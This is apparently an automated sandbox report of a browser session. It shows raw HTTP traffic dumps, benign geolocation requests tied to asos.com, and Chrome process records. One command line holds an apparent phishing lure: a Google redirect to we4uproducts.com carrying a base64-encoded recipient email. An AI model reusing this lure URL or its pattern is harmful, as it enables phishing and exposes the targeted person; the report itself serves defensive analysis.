                                                                                                                                                                                                                                                                                      2024-10-24 22:07:40 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 62 2c 21 30 29 2c 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 72 65 72 65 6e 64 65 72 69 6e 67 63 68 61 6e 67 65 22 2c 62 2c 21 30 29 7d 2c 43 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 3c 30 26 26 28 77 3d 53 28 29 2c 45 28 29 2c 6c 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 3d 53 28 29 2c 45 28 29 7d 29 2c 30 29 7d 29 29 29 2c 7b 67 65 74 20 66 69 72 73 74 48 69 64 64 65 6e 54 69 6d 65 28 29 7b 72 65 74 75 72 6e 20 77 7d 7d 7d 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 64 6f 63 75 6d 65 6e 74 2e 70
                                                                                                                                                                                                                                                                                      Data Ascii: function(){removeEventListener("visibilitychange",b,!0),removeEventListener("prerenderingchange",b,!0)},C=function(){return w<0&&(w=S(),E(),l((function(){setTimeout((function(){w=S(),E()}),0)}))),{get firstHiddenTime(){return w}}},P=function(e){document.p


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      71192.168.2.1649932104.18.32.1374436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:41 UTC591OUTGET /cookieconsentpub/v1/geo/location HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: geolocation.onetrust.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      accept: application/json
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Origin: https://www.asos.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://www.asos.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:41 UTC370INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:07:41 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                                                                      Content-Length: 66
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: Content-Type
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, OPTIONS
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d47fe39f72cd7-DFW
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:41 UTC66INData Raw: 7b 22 63 6f 75 6e 74 72 79 22 3a 22 55 53 22 2c 22 73 74 61 74 65 22 3a 22 54 58 22 2c 22 73 74 61 74 65 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 41 22 7d
                                                                                                                                                                                                                                                                                      Data Ascii: {"country":"US","state":"TX","stateName":"Texas","continent":"NA"}


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      72192.168.2.1649936172.64.155.1194436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:42 UTC380OUTGET /cookieconsentpub/v1/geo/location HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: geolocation.onetrust.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:42 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:07:42 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/javascript
                                                                                                                                                                                                                                                                                      Content-Length: 77
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d48038f17a922-DFW
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:42 UTC77INData Raw: 6a 73 6f 6e 46 65 65 64 28 7b 22 63 6f 75 6e 74 72 79 22 3a 22 55 53 22 2c 22 73 74 61 74 65 22 3a 22 54 58 22 2c 22 73 74 61 74 65 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 41 22 7d 29 3b
                                                                                                                                                                                                                                                                                      Data Ascii: jsonFeed({"country":"US","state":"TX","stateName":"Texas","continent":"NA"});


                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                                                      Start time:18:05:37
                                                                                                                                                                                                                                                                                      Start date:24/10/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                                                                      Start time:18:05:37
                                                                                                                                                                                                                                                                                      Start date:24/10/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1964,i,9108029125192006270,4692683740069077808,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                                                      Start time:18:05:39
                                                                                                                                                                                                                                                                                      Start date:24/10/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fwe4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20="
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      No disassembly